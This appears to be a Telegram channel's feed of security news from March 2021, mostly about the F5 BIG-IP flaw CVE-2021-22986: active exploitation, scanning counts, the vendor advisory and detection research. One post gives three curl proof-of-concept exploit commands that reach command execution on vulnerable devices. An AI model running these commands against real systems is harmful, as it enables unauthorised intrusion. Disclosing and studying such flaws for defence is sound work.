March 20, 2021 at 01:27PM

■■□□□ Critical F5 BIG-IP Flaw Now Under Active Attack (CVE-2021-22986). Researchers are reporting mass scanning for – and in-the-wild exploitation of – a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure. https://t.me/cKure/7281

March 20, 2021 at 11:57AM

■□□□□ Pre-Auth RCE Flaw Found in F5 BIG-IP Platform (CVE-2021-22986). Spyse scanners detected over 61,000 domains and 194,000 IP addresses, all of them potentially vulnerable. Spyse search query: https://spyse.com/target/technology/F5%20BigIP https://t.me/cKure/7278

March 20, 2021 at 11:52AM

■■■■■ CVE-2021-22986: Execute arbitrary system commands, create or delete files, disable services.
PoC #1: curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
PoC #2: curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"id"}'
PoC #3: curl -ksu admin:[redacted] https://[victimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
https://t.me/cKure/7273

March 20, 2021 at 11:46AM

■■■■■ CVE-2021-22986: iControl REST unauthenticated RCE. https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 https://t.me/cKure/7272

March 20, 2021 at 03:59AM

■■■■■ CVE-2021-22986: iControl REST unauthenticated remote command execution vulnerability. https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/ https://t.me/cKure/7270

March 20, 2021 at 03:50AM

■■■■■ Security Advisory Regarding F5 Vulnerabilities. The advisory acknowledges over 21 vulnerabilities in total: four critical, seven high, and ten medium CVEs. iControl REST unauthenticated remote command execution vulnerability: CVE-2021-22986. https://support.f5.com/csp/article/K03009991 https://t.me/cKure/7269

March 20, 2021 at 03:45AM

■□□□□ Operation Exchange Marauder. Exploiting multiple zero-day vulnerabilities in Microsoft Exchange. https://www.reddit.com/r/blueteamsec/comments/lwdauf/operation_exchange_marauder_active_exploitation/ #zeroday #0day https://t.me/cKure/7268